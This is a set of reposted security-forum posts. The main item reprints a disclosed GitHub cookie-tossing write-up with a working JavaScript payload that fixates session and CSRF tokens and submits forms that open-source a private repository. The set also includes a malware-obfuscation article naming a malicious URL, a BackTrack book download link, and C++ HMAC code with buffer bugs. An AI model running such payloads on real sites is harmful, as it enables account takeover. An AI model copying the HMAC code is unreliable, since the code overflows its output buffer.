pseudo random function with the password and a salt as inputs. The wrapper sets HMAC-SHA-256 as the chosen pseudo random function and uses a default iteration count of 10000. /// Derive a key using PBKDF2-HMAC-SHA-256 template <typename C1, typename C2, typename C3> void derive_key(C3 &key, const C1 &passwd, const C2 &salt, int c = 10000) The salt can be any public value that will be persisted between application runs. Repeated invocations of this key derivation routine with the same password and salt value produce the same key bits. This saves us from the hassle of securely storing the secret key assuming that the application can interact with a human user and prompt for the password. Here's a sample invocation of the key derivation routine: void key_generation() { crypto::block key; // 128 bit key crypto::block salt; // 128 bit salt crypto::fill_random(salt); // random salt crypto::derive_key(key, "password", salt); // password derived key crypto::cleanse(key) // clear sensitive data } [h=4]Message Digests and Message Authentication Codes[/h] Cryptographic hashes are compression functions that digest an arbitrary sized message into a small fingerprint that uniquely represents it. Although they are the building blocks for implementing integrity checks, a hash, by itself, cannot guarantee integrity. An adversary capable of modifying the message is also capable of recomputing the hash of the modified message to send along. For an additional guarantee on the origin we need a stronger primitive which is the message authentication code (MAC). A MAC is a keyed-hash, i.e. a hash that can only be generated by those who posses an assumed shared key. The assumption of secrecy of the key limits the possible origins and thus provides us the guarantee that an adversary couldn't have generated it. MD5 should not be used and SHA-1 hashes are considered weak and unsuitable for all new applications. The wrapper uses SHA-256 for generating plain digests and HMAC with SHA-256 for MACs. /// Generates a keyed or a plain cryptographic hash. class hash: boost::noncopyable { public: /// A convenience typedef for a 256 SHA-256 value. typedef boost::array<unsigned char, 32> value; /// The plain hash constructor (for message digests). hash(); /// The keyed hash constructor (for MACs) template<typename C> hash(const C &key); /// Include the contents of the passed container for hashing. template <typename C> hash &update(const C &data); /// Get the resultant hash value. template<typename C> void finalize(C &sha); /// ... details ... }; The default constructor of the class initializes the instance for message digests. The other constructor takes a key as input and initializes the instance for message authentication codes. Once initialized, the data to be hashed can be added by invoking the update method (multiple times, if required). The resulting hash or MAC is a SHA-256 hash (a 256 bit value) that can be extracted using the finalize method. The shorthand typedef hash::value can be used to hold the result. The finalize method also reinitializes the underlying hash context and resets the instance for a fresh hash computation. Here's how you can use the class: void message_digest() { crypto::hash md; // the hash object crypto::hash::value sha; // the hash value md.update("hello world!"); // add data md.update("see you world!"); // add more data md.finalize(sha); // get digest value } void message_authentication_code() { crypto::block key; // the hash key crypto::fill_random(key); // random key will do (for now) crypto::hash h(key); // the keyed-hash object crypto::hash::value mac; // the mac value h.update("hello world!"); // add data h.update("see you world!"); // more data h.finalize(mac); // get the MAC code crypto::cleanse(key) // clean senstive data } [h=4]Authenticated Encryption with Associated Data[/h] Encryption guarantees confidentiality and authenticated encryption extends that guarantee to guard against tampering of encrypted data. Operation modes like CBC or CTR cannot detect modifications to the ciphertext and decrypt tweaked data as they would decrypt any other ciphertext. An adversary can use this fact to make calibrated modifications to the ciphertext and end up with the desired plaintext in the decrypted data. The recommended way to guard against such attacks is to use an authenticated encryption mode like the Galois Counter Mode (GCM). Authenticated encryption schemes differ from the simpler schemes in that they produce an extra output along with the cipher text. This extra output is an authentication tag that is required as an input at the time of decryption where it is used to detect modifications in the ciphertext. Another feature of authenticated encryption is their support for associated data. Network protocol messages include data (ex: header fields in packets) that doesn't need to be encrypted but must be guarded against modifications in transit. Authenticated encryption schemes allow the addition of such data into the tag computation. So while the adversary can view this data in transit, it cannot be modified without the decryption routine noticing it. The following class provides authenticated encryption with associated data: /// Provides authenticated encryption (AES-128-GCM) class cipher : boost::noncopyable { public: /// Encryption mode constructor. template<typename K, typename I> cipher(const K &key, const I &iv); /// Decryption mode constructor. template<typename K, typename I, typename S> cipher(const K &key, const I &iv, S &seal); /// The cipher transformation. template<typename I, typename O> cipher &transform(const I &input, O &output); /// Adds associated authenticated data. template<typename A> cipher &associate_data(const A &aad); /// The encryption finalization routine. template<typename S> void seal(S &seal); /// The decryption finalization routine (throws if the ciphertext is corrupt) void verify(); /// ... details ... }; The crypto::cipher class has two constructors. The 2 argument variant takes a key and an initialization vector (128 bits each) and initializes the instance for encryption. Plaintext can be transformed into ciphertext using the transform method. The GCM mode does not use any padding so the output ciphertext buffer must be as big as the input plaintext buffer. If there's any associated data that needs to be sent along with the ciphertext it can be added using the associate_data method. Note that the OpenSSL implementation of GCM requires that associated data is added before the plaintext is added (i.e. all calls to associate_data must precede all calls to transform.) Once all the data has been added, the seal method must be invoked to obtain the authentication tag (128 bits) and it must be sent along with the ciphertext. The 3 argument constructor takes a key, an IV and the encryption seal as inputs and initializes the instance for decryption. Ciphertext can then be transformed to plaintext using the transform method (after adding any associated data using the associate_data method). Before using the plaintext, the verify method must be invoked to detect any tampering in the ciphertext or associated data. If all is well the method silently returns, however if the seal does not match the expected tag value, an exception is raised and the decrypted plaintext must be rejected. The following sample shows the usage: void authenticated_encrypt_decrypt() { crypto::block iv; // initialization vector crypto::block key; // encryption key crypto::block seal; // container for the seal crypto::fill_random(iv); // random initialization vector crypto::fill_random(key); // random key will do (for now) unsigned char date[] = {14, 1, 13}; // associated data std::string text("can you keep a secret?"); // message (plain-text) std::vector<unsigned char> ciphertext(text.size()); { crypto::cipher cipher(key, iv); // initialize cipher (encrypt mode) cipher.associate_data(date); // add associated data first cipher.transform(text, ciphertext); // do transform (i.e. encrypt) cipher.seal(seal); // get the encryption seal } std::vector<unsigned char> decrypted(ciphertext.size()); { crypto::cipher cipher(key, iv, seal); // initialize cipher (decrypt mode) cipher.associate_data(date); // add associated data first cipher.transform(ciphertext, decrypted); // do transform (i.e. decrypt) cipher.verify(); // check the seal } crypto::cleanse(key) // clear senstive data That completes the list of primitives we started off with. There's more to be done, in particular, some for primitives that use public key cryptography, but I'll leave that for some other day. © 2013 Aldrin D'Souza Sursa: Cryptographic Primitives in C++
  11. [h=3]Hacking Github with Webkit[/h]Personal: EgorHomakov.com, Consulting: Sakurity [h=2]Friday, March 8, 2013[/h]Previously on Github: XSS, CSRF (My github followers are real, I gained followers using CSRF on bitbucket), access bypass, mass assignments (2 Issues Reported forever), JSONP leaking, open redirect..... TL;DR: Github is vulnerable to cookie tossing. We can fixate _csrf_token value using a Webkit bug and then execute any authorized requests. Github Pages Plain HTML pages can served from yourhandle.github.com. These HTML pages may contain Javascript code. Wait. Custom JS on your subdomains is a bad idea: If you have document.domain='site.com' anywhere on the main domain, for example xd_receiver, then you can be easily XSSed from a subdomain Surprise, Javascript code can set cookies for the whole *.site.com zone, including the main website. [h=2]Webkit & cookies order[/h] Our browsers send cookies this way: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED; Please have in mind that Original _gh_sess and Dropped _gh_sess are two completely different cookies! They only share same name. Also there is no way to figure out which one is Domain=github.com and which is Domain=.github.com. Rack (a common interface for ruby web applications) uses the first one: cookies.each { |k,v| hash[k] = Array === v ? v.first : v } Here's another thing, Webkit (Chrome, Safari, and the new guy, Opera) sends cookies ordering them not by Domain (Domain=github.com must go first), and even not by httpOnly (they should go first obviously). It orders them by the creation time (I might be wrong here, but this is how it looks like). First of all let's have a look at the HACKED cookie. PROTIP — save it as decoder.rb and decode sessions faster: require'uri' require'base64' p Marshal.load(Base64.decode64(URI.decode(gets.split('--').first))) ruby decoder.rb BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b {:session_id=>"5a78a4fa3d808ba417e9cf29f255884d", :_csrf_token=>"ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="} on a subdomain we create _gh_sess=HACKED; Domain=.github.com window.open('https://github.com'). Browser sends: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED; Server responds: Set-Cookie:_gh_sess=ORIGINAL; httponly .... This made our HACKED cookie older then freshly received ORIGINAL cookie. Repeat request: window.open('https://github.com'). Browser sends: Cookie: _gh_sess=HACKED; _gh_sess=ORIGINAL; Server response: Set-Cookie:_gh_sess=HACKED; httponly .... Voila, we fixated it in Domain=github.com httponly cookie. Now both Domain=.github.com and Domain=github.com cookies have the same HACKED value. destroy the Dropped cookie, the mission is accomplished: document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT'; Initially I was able to break login (500 error for every attempt). I had some fun on twitter. Github staff banned my repo. Then I figured out how to fixate "session_id" and "_csrf_token" (they never get refreshed if already present) It will make you a guest user (logged out) but after logging in values will remain the same. [h=2]Steps:[/h] let's choose our target. We discussed XSS-privileges problem on twitter a few days ago. Any XSS on github can do anything: e.g. open source or delete a private repo. This is bad and Pagebox technique or Domain-splitting would fix this. We don't need XSS now since we fixated the CSRF token. (CSRF attack is almost as serious as XSS. Main profit of XSS - it can read responses. CSRF is write-only). So we would like to open source github/github, thus we need a guy who can technically do this. His name is the Githubber. I send an email to the Githubber. "Hey, check out new HTML5 puzzle! http://blabla.github.com/html5_game" the Githubber opens the game and it executes the following javascript — replaces his _gh_sess with HACKED (session fixation): document.cookie='_gh_sess=BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b;Domain=.github.com;'; x=window.open('https://github.com/'); setTimeout(function(){ x2=window.open('https://github.com/'); },3000); setTimeout(function(){ x.close() && x2.close(); document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT'; //_csrf_token is ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4= //insert <script src="/done.js"> every 1 second },10000); done=function(v){ if(v){ //make repo private again }else{ //keep trying to open source } } HACKED session is user_id-less (guest session). It simply contains session_id and _csrf_token, no certain user is specified there. So the Game asks him explictely: please Star us on github (or smth like this) <link>. He may feel confused (a little bit) to be logged out. Anyway, he logs in again. user_id in session belongs to the Githubber, but _csrf_token is still ours! Meanwhile, the Evil game inserts <script src=/done.js> every 1 second. It contains done(false) by default — it means, keep submitting the form to iframe : <form target=irf action="https://github.com/github/github/opensource" method="post"> <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=" </form> At the same time every 1 second I execute on my machine: git clone git://github.com/github/github.git As soon as the repo is opensourced my clone request will be accepted. Then I change /done.js: "done(true)". This will make Evil game to submit similar form and make github/github private again: <form target=irf action="https://github.com/github/github/privatesource" method="post"> <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=" </form> the Githubber replies: "Nice game" and doesn't notice anything (github/github was open sourced for a few seconds and I cloned it). Oh, his CSRF token is still ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4= Forever. (only cookies reset will update it) btw i don't like how cookies work Fast fix — now github expires Domain=.github.com cookie, if 2 _gh_sess cookies were sent on https://github.com/*. It kills HACKED just before it becomes older than ORIGINAL. Proper fix would be using githubpages.com or another separate domain. Blogger uses blogger.com as dashboard and blogspot.com for blogs. Last time I promised to publish an OAuth security insight This time I promise to write Webkit (in)security tips in a few weeks. There are some WontFix issues I don't like (related to privacy). P.S. I reported the fixation issue privately only because I'm a good guy and was in a good mood. Responsible disclosure is way more profitable with other websites, when I get a bounty and can afford at least a beer. Perhaps, tumblr has a similar issue. I didn't bother to check Posted by Egor Homakov at 8:33 PM Sursa: Egor Homakov: Hacking Github with Webkit
  12. Some dark corners of C O prezentare care trebuie vazuta de toti programatorii C: https://docs.google.com/presentation/d/1h49gY3TSiayLMXYmRMaAEMl05FaJ-Z6jDOWOz3EsqqQ/preview?usp=sharing&sle=true#slide=id.gaf50702c_0153
  13. Practical x64 Assembly and C++ Tutorials 10:48 1 de la WhatsACreel 1,127 de vizion?ri 9:19 2 Intro, briefly how to call x64 ASM from C++ de la WhatsACreel 14,821 de vizion?ri 11:33 3 Integer data types so we're all on the same page de la WhatsACreel 3,242 de vizion?ri 9:25 4 Intro to Registers, the 8086 de la WhatsACreel 3,180 de vizion?ri 7:59 5 This one is about the 386 and 486 register sets de la WhatsACreel 2,190 de vizion?ri 12:01 6 Finally we get to our modern x64 register set de la WhatsACreel 2,334 de vizion?ri 13:13 7 We'll look at a few useful instructions today. de la WhatsACreel 2,539 de vizion?ri 11:58 8 This one is about the important debugging windows in Visual Studio 2010 Express de la WhatsACreel 4,492 de vizion?ri 12:28 9 Today we'll look at Jumps, Labels and Comparing operands. de la WhatsACreel 2,077 de vizion?ri 11:41 10 This one is how to pass integer parameters via the registers and return them in RAX de la WhatsACreel 2,229 de vizion?ri 13:20 11 Some instructions for performing boolean logic de la WhatsACreel 1,835 de vizion?ri 14:39 12 Pointers, Memory and the Load Effective Address Instruction de la WhatsACreel 2,052 de vizion?ri 9:18 13 Planning prior to programming a small but useful algorithm to Zero an array de la WhatsACreel 1,913 vizion?ri 10:12 14 This is the programming of the algorithm we went through above de la WhatsACreel 1,993 de vizion?ri 11:56 15 Intro to reserving space in the data segment de la WhatsACreel 1,438 de vizion?ri 12:57 16 This one is about 4 shift instructions, SHL, SHR, SAL and SAR de la WhatsACreel 2,362 de vizion?ri 13:54 17 We'll look at the rather strange double precision shifts SHLD and SHRD de la WhatsACreel 1,140 de vizion?ri 13:31 18 Some rotate instructions, ROL, ROR, RCL and RCR de la WhatsACreel 1,528 de vizion?ri 20:32 19 The Multiplication and Division instructions de la WhatsACreel 1,885 de vizion?ri 19:04 20 Flags register and conditional moves and jumps de la WhatsACreel 1,724 de vizion?ri 16:50 21 Addressing modes from registers and immediates to SIB pointers. de la WhatsACreel 1,775 de vizion?ri 16:04 22 Intro to image processing de la WhatsACreel 1,821 de vizion?ri 19:43 23 This is the C++ image processing one de la WhatsACreel 2,455 de vizion?ri 23:41 24 This is C++ adjust brightness de la WhatsACreel 1,346 de vizion?ri 13:14 25 This is the Assembly version of the adjust brightness algorithm de la WhatsACreel 746 de vizion?ri 23:51 26 This is the Assembly version of the adjust brightness algorithm de la WhatsACreel 1,136 de vizion?ri 22:32 27 Introduction to the stack de la WhatsACreel 3,216 vizion?ri 17:42 28 Calling a C++ function from ASM de la WhatsACreel 1,498 de vizion?ri 31:39 29 Intro to the rather daunting stack frame de la WhatsACreel 2,416 vizion?ri 16:26 30 The test instruction is a AND but doesn't set the answer in op1 de la WhatsACreel 956 de vizion?ri 18:18 31 Testing single bits from a bit array de la WhatsACreel 893 de vizion?ri 14:47 32 Many little misc. instructions de la WhatsACreel 1,046 de vizion?ri 19:40 33 Three tutorials on the string instructions de la WhatsACreel 779 de vizion?ri 17:10 34 Three tutorials on the string instructions de la WhatsACreel 598 de vizion?ri 10:54 35 Three tutorials on the string instructions de la WhatsACreel 719 vizion?ri 17:04 36 This one is on the SETcc instructions which set bytes to 1 or 0 based on a condition de la WhatsACreel 505 vizion?ri 17:39 37 We will spend some time now looking at a few algorithms for practice, this one's FindMax(int*, int) de la WhatsACreel 538 de vizion?ri 21:26 38 This one is the Euclidean Algorithm de la WhatsACreel 710 vizion?ri 12:18 39 We've finally made it through most of the regular x86 instruction set, now for something completely different de la WhatsACreel 718 vizion?ri 24:11 40 Introducing the CPUID instruction de la WhatsACreel 1,315 vizion?ri 21:36 41 A general intro to MMX and a couple of the instructions de la WhatsACreel 801 vizion?ri 18:46 42 The addition and subtraction instructions in MMX de la WhatsACreel 691 de vizion?ri 17:51 43 Multiplcation instructions in MMX de la WhatsACreel 765 de vizion?ri 20:33 44 Bit shifting in MMX de la WhatsACreel 904 vizion?ri 20:32 45 de la WhatsACreel 543 de vizion?ri 20:15 46 de la WhatsACreel 590 de vizion?ri 21:23 47 de la WhatsACreel 569 de vizion?ri 13:28 48 de la WhatsACreel 741 de vizion?ri 19:45 49 de la WhatsACreel 911 vizion?ri 29:39 50 de la WhatsACreel 961 de vizion?ri 17:18 51 de la WhatsACreel 459 de vizion?ri 30:08 52 de la WhatsACreel 342 de vizion?ri 33:59 53 de la WhatsACreel 596 de vizion?ri 21:10 54 de la WhatsACreel 411 vizion?ri 12:40 55 de la WhatsACreel 239 de vizion?ri 12:32 Playlist: http://www.youtube.com/playlist?list=PL0C5C980A28FEE68D
  14. [h=1]Yes, your code does need comments.[/h] I imagine that this post is going to draw the ire of some. It seems like every time I mention this on Twitter or anywhere else there is always some pushback from people who think that putting comments in your code is a waste of time. I think your code needs comments, but so we have a mutual understanding, lets qualify that. def somefunction(a, : #add a to b c = a + b #return the result of a + b return c I understand this is a contrived example but this is the comment trap that new developers get caught in. These types of comments really aren't useful to anyone. Peppering the code that you just wrote with excessive comments, especially when it is abundantly clear what the code is doing, is the least useful type of comment you can write. "Code is far better describing what code does than English, so just write clear code" This is usually the blowback you get from comments like the ones above. I don't disagree, programming languages are definitely more precise than English. What I don't agree with is the idea that if the code is clear and understandable that comments are unneeded or don't have a place in modern software development. So knowing this, what kind of comments am I advocating for? I'm advocating for comments as documentation. Comments that explain what a complex piece of code does, and most importantly what an entire function or Class does and why they exist in the first place. So what is a good example of the kind of documentation I am talking about? I think Zed Shaw's Lamson is a fantastic example of this. Here is a code excerpt from that: class Relay(object): """ Used to talk to your "relay server" or smart host, this is probably the most important class in the handlers next to the lamson.routing.Router. It supports a few simple operations for sending mail, replying, and can log the protocol it uses to stderr if you set debug=1 on __init__. """ def __init__(self, host='127.0.0.1', port=25, username=None, password=None, ssl=False, starttls=False, debug=0): """ The hostname and port we're connecting to, and the debug level (default to 0). Optional username and password for smtp authentication. If ssl is True smtplib.SMTP_SSL will be used. If starttls is True (and ssl False), smtp connection will be put in TLS mode. It does the hard work of delivering messages to the relay host. """ self.hostname = host self.port = port self.debug = debug self.username = username self.password = password self.ssl = ssl self.starttls = starttls ... This code snippet is from https://github.com/zedshaw/lamson/blob/master/lamson/server.py. You can poke around the lamson code and see some good looking Python code but also some usefully documented code. [h=2]So hold on. Why are we writing comments?[/h] Why are we writing comments, if you write clean, understandable code? Why do we need to explain what classes and functions do if the code is "clear" and easy to understand. In my opinion, we write comments to capture intent. Comments are the only way to capture the intent of the code at the time of writing. Looking at a block of code only allows you to understand the intent of that particular code at that moment in time which may be very different then the intent of the code at time of its original writing. [h=2]Writing comments captures intent.[/h] Writing comments captures the original meaning of the code. Python has docstrings for this, other languages have comparable options. What is so good about docstring type comments? In conjunction with unambiguous class and function names they can easily describe the original intent of your code. Why is capturing the original intent of your code important? It allows a developer, at a glance, to look at a piece of code and know why it exists. It reduces situations where a piece of codes original intent isn't clear then gets modified and leads to unintended regressions. It reduces the amount of context a developer must hold his/her mind to solve any particular problem that may be contained in a piece of code. Writing comments to capture intent is like writing tests to prove that your software does what is expected. [h=2]Where do we go from here?[/h] The first step is to realize that the documentation/comments accompanying a piece of code can be just important as the code itself and need to be maintained as such. Just like code can become stale if you don't keep it updated so do comments. If you update some code you must update the accompanying comments/documentation or they become useless and can lead to more developer error then not having comments at all. So we have to treat comments and documentation as first class citizens. Next we have to agree on what is important to comment on in your code, and how to structure your code to make your use of comments most effective. Most of this relies on your own judgement but we can cover most issues with some steadfast rules. Never name your classes and functions ambiguously. Always use inline comments on code blocks that are complicated or may appear unclear. Always use descriptive variable names. Always write comments describing the intent or reason why a piece of code exists. Always keep comments up to date when editing commented code. As you can see from the points above code as documentation and comments as documentation are not mutually exclusive. Both are necessary to create readable code that is easily maintained by you and future maintainers. Sursa: Yes, your code does need comments. - Mike Grouchy
  15. BackTrack 5 Cookbook Over 80 recipes to execute many of the best known and little known penetration testing aspects of BackTrack 5 Willie Pritchett David De Smet Over 80 recipes to execute many of the best known and little known penetration testing aspects of BackTrack 5 - Learn to perform penetration tests with BackTrack 5 - Nearly 100 recipes designed to teach penetration testing principles and build knowledge of BackTrack 5 Tools - Provides detailed step-by-step instructions on the usage of many of BackTrack's popular and not-so- popular tools In Detail BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use. It is named after backtracking, a search algorithm. "BackTrack 5 Cookbook" provides you with practical recipes featuring many popular tools that cover the basics of a penetration test: information gathering, vulnerability identification, exploitation, priviledge escalation, and covering your tracks. The book begins by covering the installation of BackTrack 5 and setting up a virtual environment to perform your tests. We then dip into recipes involving the basic principles of a penetration test such as information gathering, vulnerability identification, and exploitation. You will further learn about privilege escalation, radio network analysis, Voice over IP, Password cracking, and BackTrack forensics. "BackTrack 5 Cookbook" will serve as an excellent source of information for the security professional and novice alike. What will you learn from this book: - Install and set up BackTrack 5 on multiple platforms - Customize BackTrack to fit your individual needs - Exploit vulnerabilities found with Metasploit - Locate vulnerabilities Nessus and OpenVAS - Provide several solutions to escalate privileges on a compromised machine - Learn how to use BackTrack in all phases of a penetration test - Crack WEP/WPA/WPA2 Encryption - Learn how to monitor and eavesdrop on VOIP networks Download: https://cdn.anonfiles.com/1358842982481.pdf Sursa: Data 4 Instruction: BackTrack 5 Cookbook
  16. Obfuscation: Malware’s best friend By Joshua Cannell March 8, 2013 In Malware Intelligence Here at Malwarebytes, we see a lot of malware. Whether it’s a botnet used to attack web servers or a ransomware stealing your files, much of today’s malware wants to stay hidden during infection and operation to prevent removal and analysis. Malware achieves this using many techniques to thwart detection and analysis—some examples of these include using obscure filenames, modifying file attributes, or operating under the pretense of legitimate programs and services. In more advanced cases, the malware might attempt to subvert modern detection software (i.e. MBAM) to prevent being found, hiding running processes and network connections. The possibilities are quite endless.Despite advances in modern malware, dirty programs can’t hide forever. When malware is found, it needs some additional layers of defense to protect itself from analysis and reverse engineering. By implementing additional protection mechanisms, malware can be more difficult to detect and even more resilient to takedown. Although a lot of tricks are used to hide malware’s internals, a technique used in nearly every malware is binary obfuscation.Obfuscation (in the context of software) is a technique that makes binary and textual data unreadable and/or hard to understand. Software developers sometimes employ obfuscation techniques because they don’t want their programs being reverse-engineered or pirated.Its implementation can be as simple as a few bit manipulations and advanced as cryptographic standards (i.e. DES, AES, etc). In the world of malware, it’s useful to hide significant words the program uses (called “strings”) because they give insight into the malware’s behavior. Examples of said strings would be malicious URLs or registry keys. Sometimes the malware goes a step further and obfuscates the entire file with a special program called a packer.Let’s see some practical obfuscation examples used in a lot of malware today. Scenario 1: The exclusive or operation (XOR) The exclusive or operation (represented as XOR) is probably the most commonly used method of obfuscation. This is because it is very easy to implement and easily hides your data from untrained eyes. Consider the following highlighted data. Obfuscated data is unreadable in its current form. In its current form, the data is unreadable. But when we apply an XOR value of 0×55, we see something else entirely. An XOR operation using 0×55 reveals a malicious URL. Now we have our malicious URL. Looks like this malware contacts “ http://tator1157.hostgator.com” to retrieve the file “bot.exe”.This form of obfuscation is typically very easy to defeat. Even if you don’t have the XOR key, programs exist to manually cycle through every possible single-byte XOR value in search of a particular string. One popular tool available on both UNIX and Window platforms is XORSearch written by Didier Stevens. This tool searches for strings encoded in multiple formats, including XOR.Because malware authors know programs like these exist, they implement tricks of their own to avoid detection. One thing they might do is a two-cycle approach, performing an XOR against data with a particular value and then making a second pass with another value. A separate technique (although equally effective) commonly used is to increment the XOR value in a loop. Using the previous example, we could XOR the letter ‘h’ with 0×55, then the letter ‘t’ with 0×56, and so on. This would also defeat common XOR detection programs.Scenario 2: Base64 encodingBase64 encoding has been used for a long time to transfer binary data (machine code) over a system that only handles text. As the name suggests, its encoding alphabet contains 64 characters, with the equal sign (=) used as a padding character. The alphabet contains the characters A-Z, a-z, 0-9, + and /. Below is an example of some encoded text representing the string pointing to the svchost.exe file, used by Windows to host services. Base64 is commonly used in malware to disguise text strings. While the encoded output is completely unreadable, base64 encoding is easier to identify than a lot of encoding schemes, usually because of its padding character. There are a lot of tools that can perform base64 encode/decode functions, both online and via downloaded programs.Because base64 encoding is so easy to overcome, malware authors usually take things a step further and change the order of the base64 alphabet, which breaks standard decoders. This allows for a custom encoding routine that is more difficult to break. Scenario 3: ROT13 Perhaps the most simple of the three techniques that’s commonly used is ROT13. ROT is an ASM instruction for “rotate”, hence ROT13 would mean “rotate 13”. ROT13 uses simple letter substitution to achieve obfuscated output.Let’s start by encoding the letter ‘a’. Since we’re rotating by thirteen, we count the next thirteen letters of the alphabet until we land at ‘n’. That’s really all there is to it! ROT13 uses a simple letter substitution to jumble text. The above image shows a popular registry key used to list programs that run each time a user logs in. ROT13 can also be modified to rotate a different number of characters, like ROT15. Scenario 4: Runtime packers In a lot of cases, the entire malware program is obfuscated. This prevents anybody from viewing the malware’s code until it is placed in memory.This type of obfuscation is achieved using what’s known as a packer program. A packer is piece of software that takes the original malware file and compresses it, thus making all the original code and data unreadable. At runtime, a wrapper program will take the packed program and decompress it in memory, revealing the program’s original code.Packers have been used for a long time for legitimate purposes, some of which include reducing file sizes and protecting against piracy. They help conceal vital program components and deter novice program crackers.Fortunately, we aren’t without help when it comes to identifying and unpacking these files. There are many programs available that detect commercial packers, and also advise on how to unpack. Some examples of these file scanners are Exeinfo PE and PEID (no longer developed, but still available for download). Exeinfo PE is a great tool for detecting common packers. However, as you might expect, the situation can get more complicated. Malware authors like to create custom packers to prevent less-experienced reverse engineers from unpacking their malware’s contents. This approach defeats modern unpacking scripts, and forces reversers to manually unpack the file and see what the program is doing. Even rarer, sometimes malware authors will twice-pack their files, first with a commercial packer and then their own custom packer. Conclusion While this list of techniques is certainly not exhaustive, hopefully this has provided a better understanding of how malware hides itself from plain sight. Obfuscation is a highly reliable technique that’s used to hide file contents, and sometimes the entire file itself if using a packer program.Obfuscation techniques are always changing, but rest assured knowing we at Malwarebytes are well-aware of this. Our staff has years of experience in fighting malware, and goes to great lengths to see what malicious files are really doing.Bring it on, malware. Do your worst! Sursa: Obfuscation: Malware’s best friend | Malwarebytes Unpacked
  17. Nytro

    Hmac md5/sha1

    [h=1]HMAC MD5/SHA1[/h] Author: [h=3]RosDevil[/h]Hi people, this is a correct usuage of windows' WINCRYPT Apis to peform HMAC MD5/SHA1 The examples shown on msdn aren't correct and have some bugs, so i decided to share a correct example. #include <iostream> #include "windows.h" #include <wincrypt.h> #ifndef CALG_HMAC #define CALG_HMAC (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HMAC) #endif #ifndef CRYPT_IPSEC_HMAC_KEY #define CRYPT_IPSEC_HMAC_KEY 0x00000100 #endif #pragma comment(lib, "crypt32.lib") using namespace std; char * HMAC(char * str, char * password, DWORD AlgId); typedef struct _my_blob{ BLOBHEADER header; DWORD len; BYTE key[0]; }my_blob; int main(int argc, _TCHAR* argv[]) { char * hash_sha1 = HMAC("ROSDEVIL", "password", CALG_SHA1); char * hash_md5 = HMAC("ROSDEVIL", "password", CALG_MD5); cout<<"Hash HMAC-SHA1: "<<hash_sha1<<" ( "<<strlen(hash_sha1)<<" )"<<endl; cout<<"Hash HMAC-MD5: "<<hash_md5<<" ( "<<strlen(hash_md5)<<" )"<<endl; cin.get(); return 0; } char * HMAC(char * str, char * password, DWORD AlgId = CALG_MD5){ HCRYPTPROV hProv = 0; HCRYPTHASH hHash = 0; HCRYPTKEY hKey = 0; HCRYPTHASH hHmacHash = 0; BYTE * pbHash = 0; DWORD dwDataLen = 0; HMAC_INFO HmacInfo; int err = 0; ZeroMemory(&HmacInfo, sizeof(HmacInfo)); if (AlgId == CALG_MD5){ HmacInfo.HashAlgid = CALG_MD5; pbHash = new BYTE[16]; dwDataLen = 16; }else if(AlgId == CALG_SHA1){ HmacInfo.HashAlgid = CALG_SHA1; pbHash = new BYTE[20]; dwDataLen = 20; }else{ return 0; } ZeroMemory(pbHash, sizeof(dwDataLen)); char * res = new char[dwDataLen * 2]; my_blob * kb = NULL; DWORD kbSize = sizeof(my_blob) + strlen(password); kb = (my_blob*)malloc(kbSize); kb->header.bType = PLAINTEXTKEYBLOB; kb->header.bVersion = CUR_BLOB_VERSION; kb->header.reserved = 0; kb->header.aiKeyAlg = CALG_RC2; memcpy(&kb->key, password, strlen(password)); kb->len = strlen(password); if (!CryptAcquireContext(&hProv, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL,CRYPT_VERIFYCONTEXT | CRYPT_NEWKEYSET)){ err = 1; goto Exit; } if (!CryptImportKey(hProv, (BYTE*)kb, kbSize, 0, CRYPT_IPSEC_HMAC_KEY, &hKey)){ err = 1; goto Exit; } if (!CryptCreateHash(hProv, CALG_HMAC, hKey, 0, &hHmacHash)){ err = 1; goto Exit; } if (!CryptSetHashParam(hHmacHash, HP_HMAC_INFO, (BYTE*)&HmacInfo, 0)){ err = 1; goto Exit; } if (!CryptHashData(hHmacHash, (BYTE*)str, strlen(str), 0)){ err = 1; goto Exit; } if (!CryptGetHashParam(hHmacHash, HP_HASHVAL, pbHash, &dwDataLen, 0)){ err = 1; goto Exit; } ZeroMemory(res, dwDataLen * 2); char * temp; temp = new char[3]; ZeroMemory(temp, 3); for (unsigned int m = 0; m < dwDataLen; m++){ sprintf(temp, "%2x", pbHash[m]); if (temp [1] == ' ') temp [1] = '0'; // note these two: they are two CORRECTIONS to the conversion in HEX, sometimes the Zeros are if (temp [0] == ' ') temp [0] = '0'; // printed with a space, so we replace spaces with zeros; (this error occurs mainly in HMAC-SHA1) sprintf(res,"%s%s", res,temp); } delete [] temp; Exit: free(kb); if(hHmacHash) CryptDestroyHash(hHmacHash); if(hKey) CryptDestroyKey(hKey); if(hHash) CryptDestroyHash(hHash); if(hProv) CryptReleaseContext(hProv, 0); if (err == 1){ delete [] res; return ""; } return res; } //Note: using HMAC-MD5 you could perform the famous CRAM-MD5 used to authenticate //smtp servers. Sursa: HMAC 